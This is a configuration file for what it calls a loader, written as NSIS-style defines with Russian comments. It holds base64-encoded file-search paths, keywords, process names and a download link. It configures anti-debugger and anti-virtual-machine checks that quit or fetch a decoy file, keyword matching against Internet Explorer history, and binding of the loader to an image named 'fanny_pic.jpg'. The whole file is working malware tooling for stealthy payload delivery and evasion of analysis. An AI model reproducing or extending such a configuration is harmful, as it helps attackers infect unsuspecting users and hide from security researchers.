
;================================================================================================================

; Включение/Выключение режима отладки true/false

!define DEBUG_MODE false

; Задержка в микросекундах(Разгрузка для процессора)

!define DELAY 45

; Список доступных скрипту переменных окружения которые могут быть использованы в путях

; %APPDATA%
; %COMMONFILES32% - "C:\Program Files\Common Files","C:\Program Files (x86)\Common Files"(Windows 64)
; %COMMONFILES64% - "C:\Program Files\Common Files"
; %DESKTOP%
; %DOCUMENTS%
; %LOCALAPPDATA%
; %PROFILE%
; %PROGRAMFILES32% - "Program Files","Program Files (x86)"(Windows 64)
; %PROGRAMFILES64% - "Program Files"

; Список путей для поиска файлов(Обрабатывается по порядку слева направо)

!define PATH `'WlhsS1lrcFdRbE5VTUZwS1ZFVlZiRmhUU2psSlNITnBWM2xXUWxWR1FrVlJWbEpDU2xZd2FXWlRRamRKYVZaUlZXczVTRlZyUms1U2EyeE5VbFpOZWsxcFZXbEpRMGxzVlVaS1VGSXhTa0pVVlZwS1ZFVldWRTVxVVd4SmJqQm5aWGxLWWtwVlVrWlZNSFJWVkRGQmJGaFRTamxKU0hOcFZ6Qk5ObGhUU2prPQ=='`

; Список ключевых слов с которыми сверяется имя файла или папки

!define WORD `'WlhsV1VWVnJPVWRUVlhoR1NsWjNkV0ZWU21oaWJYTjVabE5DTjBwVlJsRlZSVkpDVmtWRmJGaEhSblJoVjA1MlltbEJiRkZXUWxGU1JVWlZVVk5XWTFsdGJHMWhXRkZuU2xWR1VWVkZVa0pXUlVWc1dFTndhV016VFdkS1ZVWlJWVVZTUWxaRlJXeFlRM0J3V1cxR2RXRXpNR2RsZVZaUlZXczVTRlZyUms1U2EyeE5VbFpOZWsxcFZtTkxiV1IzV1dsQmJGVkdTbEJTTVVwQ1ZGVmFTbFJGVmxST2FsRnNXRU53Ym1OSFNXZEtWa0pUVkRCa1UxRlZNVWRUVlhoR1ZYcE5lVXBXZUhCaWJXeDZaRU5CYkZWR1NsQlNNVXBDVkZWYVNsUkZWbFJPYWxGc1dFZHNkV0ZZVGpCSlExWlJWV3M1U0ZWclJrNVNhMnhOVWxaTmVrMXBWbU5pVjFKMFNVTldVVlZyT1VoVmEwWk9VbXRzVFZKV1RUSk9RMVpqWWxkU2RFbERWbEZWYXpsSVZXdEdUbEpyYkUxU1ZrMTZUV2xXWTFsdGJHMWhXRkZuU2xaQ1UxUXdaRk5SVlRGSFUxVjRSbFY2V1RCS1ZuaHBZVmRhY0dSRFFXeFZSa3BRVWpGS1FsUlZXa3BVUlZaVVRYcEpiRmhGUm5OWlYxSnJZVmMwWjBwV1FsTlVNR1JUVVZVeFIxTlZlRVpWZWxrd1NsWjRRbUpIUm10YVIyeDFTVU5XVVZWck9VaFZhMFpPVW10c1RWSldUWHBOYVZaalVWY3hjRmt5T1hWSlExWlJWV3M1U0ZWclJrNVNhMnhOVWxaTk1rNURWbU5SVnpGd1dUSTVkVWxEVmxGVmF6bElWV3RHVGxKcmJFMVNWazE2VFdsV1kwdHRTbnBqZVVGc1ZVWktVRkl4U2tKVVZWcEtWRVZXVkU1cVVXeFlRM0JwWXpOTlowcFdRbE5VTUdSVFVWVXhSMU5WZUVaVmVrMTVTbFo0VkdGWFpIVlpWM2QwVVRBNVRrbERWbEZWYXpsSVZXdEdUbEpyYkUxU1ZrMHlUa05XWTFVeWJHNWliVVp6VEZWT1VGUlRRV3hWUmtwUVVqRktRbFJWV2twVVJWWlVUWHBKYkZoSGJFTlpWelZ5VFdsQmJGVkdTbEJTTVVwQ1ZGVmFTbFJGVmxST2FsRnNXRWRzUTFsWE5YSk5hVUZzVlVaS1VGSXhTa0pVVlZwS1ZFVldWRTE2U1d4WVEzQmpXVzFOZFZwWWFHeEpRMVpSVldzNVNGVnJSazVTYTJ4TlVsWk5NazVEVm1OTGJIaHBXWGsxYkdWSFZXZEtWa0pUVkRCa1UxRlZNVWRUVlhoR1ZYcE5lVXBXZDNGWVEzQmpZVmMxTUdOSVNuWk1iVlkwV2xOQmJGVkdTbEJTTVVwQ1ZGVmFTbFJGVmxST2FsRnNXRU53WTB0c2VIQmlibEozWTIwNGRWcFlhR3hKUTFaUlZXczVTRlZyUms1U2EyeE5VbFpOZWsxcFZtTkxiVTV0WkVOQmJGVkdTbEJTTVVwQ1ZGVmFTbFJGVmxST2FsRnNXRWRPYldSRFFXeFZSa3BRVWpGS1FsUlZXa3BVUlZaVVRYcEpiRmhIUm01WldGcG9TVU5XVVZWck9VaFZhMFpPVW10c1RWSldUVEpPUTFaaldWZGthR1J0UldkS1ZrSlRWREJrVTFGVk1VZFRWWGhHVlhwTmVVcFdkM0ZWYVRGVVpFaHNjMXBUUVd4VlJrcFFVakZLUWxSVldrcFVSVlpVVG1wUmJGaERjRk5NVms0d1pWZDRiRWxEVmxGVmF6bElWV3RHVGxKcmJFMVNWazE2VFdsV1kwdHJSa3hSYVVKUldsaEtkRWxEVmxGVmF6bElWV3RHVGxKcmJFMVNWazB5VGtOV1kwdHJSa3hSYVVKUldsaEtkR1pUUWpkS1ZWSkdWVEIwVlZReFFXeFlRM0JHVkVWS1FrbERWa1ZTVms1TVZrVTVVVXBXZDNGU1ZYaERWV3hXVkdaVFFqZFJlbkJqUzJ4T1IxWkRRa1JQYkhkeFVWZGthR1J0UldkUmVuQmpTMnRPYzJKdVVXZFJlbkJqUzJ0T1RWWlZOVXBVTURSMVRVWkdWVWxGVFRaWVEyOHhWR3hSWjFGNmNHTkxhMHBVU1VWTk5saERjRVpVUlVwQ1NVVk5ObGhEY0VOWlZ6VnlTVVZOTmxoRmJFUlJiRGxFU1VWTk5saERjSHBqUjFaclNVVk5ObGhEY0c1alIwbG5VWHB3WTB0dFpHaGxia0o1WWpJd1oyWlJQVDA9'`

; Список имён процессов через запятую(Можно оставить пустым)

!define PROCESSES_LIST `'WTIxT2MyRlhWblZrUXpWc1pVZFZjMkZZUVhSWk1uaHdXbGMxTUV4dFZqUmFVM2g2V1ZkT2MyRlhWblZrUXpWc1pVZFZjMVV4U2tSVVJVcEVZa2RzYkdKdVVYVmFXR2hzVEVoU00xbFlaR3haYlU1ellWZFdkV1JETld4bFIxVnpaRzFXYmxsVlRuTmhWMVoxWkVNMWJHVkhWWE5hU0U1NlpFZEdlV1JETld4bFIxVnpXa2hTZDFsWWJHdGFXRTV5VEcxV05GcFRlR3hhVjNocVlrYzFNRXh0VmpSYVUzaHNZa2RLYUdKdGMzVmFXR2hzVEVkV01HTklTblpqU0UxMVdsaG9iRXhIVmxWVk0wb3lURzFXTkZwVGVIQlpiVTUyWW01T2RtSkhWWFZhV0doc1RFZDBhVmd5VG5OaFV6VnNaVWRWYzFNd2VFTlZlVFZzWlVkVmMxTXllSEJhVnpVd1VXMDFja3h0VmpSYVUzaHpXbTFPZDFsWWJIUmFWelV3V1Zkc2VreHRWalJhVTNoellqSkdhMkpYUm5CaWFUVnNaVWRWYzJKSVFtbGlNMDExV2xob2JFeEhNV3haYld3eFl6SkthR0p0ZERSalF6VnNaVWRWYzJKWE1XbFpWelZ5VEcxV05GcFRlSGRaTWtwb1ltMXpkVnBZYUd4TVNFSndZbTVDYUdWWVNYVmFXR2hzVEVaQ2NHSXlOWFZhV0VsMVdsaG9iRXhJUW5KaFZ6RjJZbTFzTUdJelNYVmFXR2hzVEVoQ2RHSXlVakZpUjFWMVdsaG9iRXhJUW5WTWJWWTBXbE40ZDJJelRqQmlWemt5V2xNMWJHVkhWWE5qU0VwMldraFdhbVJJUW5saU0xSjJaRWhzZDFwVE5XeGxSMVZ6WTFoV2NGa3lkSGRaV0d0MVdsaG9iRXhJU21waVIwWXhZbTFPYjB4dFZqUmFVM2g1V2xoU2FHRlhkM1ZhV0doc1RFaEtiR1JIUm5CaVJFMTVURzFXTkZwVGVEQmpiVVoxWXpKNGNHSnRjM1ZhV0doc1RFaFdkV0ZZVGpCamJWWm9ZbE0xYkdWSFZYTmtXRXBvWWtoQ2VXSXlNSFZhV0doc1RFaGplazF0TVhKYVIxVjFXbGhvYkV4SVpHcGlSelV3VEcxV05GcFRlRE5hYld4MVlWaE9NRXh0VmpSYVUzZ3pZVmMxZDJJelRqQk1iVlkwV2xONE0yUllRblpqTTFKb1dqSldkV1JETld4bFIxVnpWMjVhY0dSRVJrVlNhVFZzWlVkVmMxRnJUbVpVUnpsb1drZFdlVXh0VmpSYVUzaEVZa2RzYkdKdVVYbE5SRUUwVEcxV05GcFRlRXBaYlU1VFdsY3hkbVJIVlhwTlV6VnNaVWRWYzFneVdqQlpNbVIzWVhrMWJHVkhWWE5qTWs1b1kyMVNlbVJ1U1hWYVdHaHNURVZPVFZoNlJYZE9la0YzVFVSSmRWcFlhR3hNUjJ4MVpFaENlV0o1Tld4bFIxVnpWbGhDVGxsWVRqQmFXRWwxV2xob2JFeEdUa2hSYTA1ellWZFdkV1JETld4bFIxVnpXbGQ0WmxreWVIQk1iVlkwV2xONFRsWXdUbk5oVjFaMVpFUk5lVXh0VmpSYVUzaENVa2RzZVZwWFRqQk1iVlkwV2xONFExRXllSEJhVnpVd1RHMVdORnBUZUdsWmVUVnNaVWRWYzFsWE5UQk1iVlkwV2xONGFHTnRNSFZhV0doc1RFZEdlV0pXT1hSa1F6VnNaVWRWYzFGV1NrNVZNR2MxVGxNMVJsZEZWWE5aV0U1cFdWYzFjbGd5ZUhCa1IxVjFXbGhvYkV4SFNtaGliWE4xV2xob2JFeEhTbWhpYlhONlRXazFiR1ZIVlhOWmJVcDBZM2sxYkdWSFZYTlpiWE4xV2xob2JFeEZTa3hZTUhSWVRYcEpkVkpXYUVaTVIwcDFZWGsxYkdWSFZYTlJNRWwxV2xob2JFeEhUbWxOVkd0NlpIazFiR1ZIVlhOWk1rcG9ZbTF6ZFZwWWFHeE1SMDVwWWxkR2NHSnBOV3hsUTNoRVVXeE9UbEZWYkU5TWJWWTBXbE40UkZsc1RtOWFWM2h6VEcxV05GcFRlR3BpUjBsMVdsaG9iRXhGVG5OaFZVcG9ZbTF6ZFZwWWFHeE1SVTV6WVZWS2FHSnRkRkJpYlhod1ltMVdSbUpwTld4bFIxVnpVVEo0Y0ZGdFJuVmhNRGwxWWtkc2RWcFdTakZNYlZZMFdsTjRSR0pIYkVOWlZ6VnlWREkxYzJGWE5XeFdWMFYxV2xob2JFeEhUbk5oVjFaMVpFUkpkVnBZYUd4TVIwNXpZVmRXZFdSRVdYVmFXR2hzVEVkT2MyRlhWblZrUjBweVRHMVdORnBUZUdwaVJ6VXdZek5TZVV4dFZqUmFVM2hxWWtjMU1HUjZUWGxNYlZZMFdsTjRhbUl5TlRCWlYwNHdZbTFqZFZwWWFHeE1SVTUyWTIxVmRWcFlhR3hNUjA1NllVZFdjMkpETld4bFIxVnpXVE5zYVZwWVNqQmFXRXAwVEcxV05GcFRlR3BpUjJ4c1ltNVJkVnBZYUd4TVIwNTFXVEpPYzJGWFZuVmtRelZzWlVkVmMxbHRTbXBpUjJ4c1ltNVJkVnBZYUd4TVJWWTBZVmN4UkdKSGJHeGlibEYxV2xob2JFeEhXbXBaTW5od1dsYzFNRXh0VmpSYVUzaHdZekpPYWt4dFZqUmFVM2h5V1ZkS2NHSnRWakJNYlZZMFdsTjRWR05yVGsxUmJFNHdXVmhLTUV4dFZqUmFVM2g2WTIxT2FWa3llSEJhVnpVd1RHMVdORnBUZUZaalNFSm1Ua00xYkdWSFZYTlJiVVoxWVRKNGNHSnRWWFZTVm1oR1RFVmtiR0pYYkhWaFZVNXpZVmRXZFdSR1RqQlpXRkp3WWpJMGRWcFlhR3hNUmpsRVlrZHNiR0p1VWtOWlZ6VnlURzFXTkZwVGVFcFZNRTV6WVZkV2RXUkROV3hsUjFWeldUTmtla3h0VmpSYVUzaEVWRVZLUWxScmMzVlNWbWhHVEVWc1RsRnJlSEJpYlhONlRXazFiR1ZIVlhOWk1rcDZZbGRHY0dKcE5XdGlSM2R6VWpOQ2FWRXllSEJhVnpVd1ZUSmFNRmt6WkhwTWJWWTBXbE40VTJSWE5IVmFXR2hzVEVaT1NGRnJUbk5oVjFaMVpFTTFiR1ZEZUhwbFJqbEZZakpPWm1KdGEzVmFXR2hzVEVkc2FsbHNPV3BNYlZZMFdsTjRSR0pIYkd4aWJsRjZUV2sxYkdWSFZYTlJiVVoxWVRCT2MweHRWalJhVTNoS1VUQjRWV050Um5Wak0wSjJZMjVTVkdWWVRqQmFWekIxV2xob2JFeEZaRkZSYTA1ellWZFdkV1JETld4bFIxVnpVVEI0VGxGVmJFOU1iVlkwV2xONFVGUnJUa05STUhoS1RHMVdORnBUZUhsaVYwNXpZVmRXZFdSRE5XeGxSMVZ6VlcxMGFsUkhPV2hhUjFaNVRHMVdORnBUZUVSVVJVcG9ZbTF6ZWt4dFZqUmFVM2hIVVRJNWMyTXlWbEJXZVRWc1pVZFZQUT09'`

; Cсылка на скачку файла

!define LINK `'WVVoU01HTkViM1pNZVc5eFMybHZjVXRwYjNWWk1rWnA='`

;================================================================================================================

; НАСТРОЙКА ДЕТЕКТОРА ОТЛАДЧИКОВ И ВИРТУАЛЬНЫХ МАШИН.

; IF_TRAP_FOUND - Определяет какое действие выполнить если сработал детектор:
;
; just_exit - просто завершить работу и ничего не скачивать.
; use_fake_url - скачать файл по левой ссылке.

!define IF_TRAP_FOUND just_exit

; FAKE_LINK - Левая ссылка на скачку файла которая применяеться если IF_TRAP_FOUND обьявлен как use_fake_url.

!define FAKE_LINK `'WVVoU01HTkViM1pNZWtsNVRXcGpNMDU1Tlhsa1VUMDk='`

;================================================================================================================

; ПРОВЕРКА ДЕТЕКТОРА

; В режиме отладки(DEBUG_MODE) детектор сообщает результат проверки.
; Так можно легко удостовериться в том что он способен выявлять отладчики и виртуальные машины.
; Всего существует три вида сообщений которые может выдать детектор при включенном режиме отлдаки:
;
; 1 - DETECTOR: Debuggers and virtual machines not detected! Loader started in [NORMAL] mode.
; 2 - DETECTOR: Debugger or virtual machine is detected! Loader [STOPPED].
; 3 - DETECTOR: Debugger or virtual machine is detected! Loader started in [FAKE] mode.

;================================================================================================================

; Включение/Выключение поиска в истории IE
;
; 1 - Включить/0 - Выключить

!define CHECK_IE_HOSTORY 1

; Список ключевых слов для сравнения со ссылками из истории IE

!define IE_HISTORY_WORDS `'UzI1T01XTkhWbmxqU0ZaM1dsaEthVmxYTlhKak1qbHRaRWhSWjB0cmJFUlZSemw1WkVkR2MxVXhUazFKUTNCcFl6SnJkVnBIZUhOSlEzQndZekphZVdJeU5UQk1ia0o1WVZjNU1tUkhTWFZaTWpsMFNVTndVV0l6U2pCWlYzaFVWVEIzWjB0cmJFcFZlVEZJV1ZoU2JFeHRVbk5pUTBGeFUxWk9RbFZGYkc1WldGSnNURzFTYzJKRFFYRlpiVll3V1ZNMWRGa3lTWFZqYmxWblMyMXNhVmxYTlhKSlEzQndXVzVLZWtsRGNIQlpNbmh3V2xjMU1FbERjR3hNV0VKeldWaFJkV0pYVW5SWmJVWjFZWGsxYW1JeU1HZExiV3hwV1hsQmNWcFhlR2xqYmxaNlNVTndjRXhYVm5OWmJVVm5TMjFPYzFsdFJuVmhlVFYwWVZjMWFWbFhOWEpNYmtveFNVTndhbUZIVm5OaFZ6VnJXVzFHZFdGNU5YbGtVemwyWW0xNGNHSnRWWFpKUTNBeFpESkdibGxwUVhGa00yUXpXVzFHZFdGNVFYRmFSMHAyU1VOd2NGbHBOR2RMYlU1eldXMUdkV0Y1UVhGaVYwWndZbWsxTm1SWGR6MD0='`

; Имя документа который будет склеен с лоудером

!define DOC_NAME `fanny_pic.jpg`
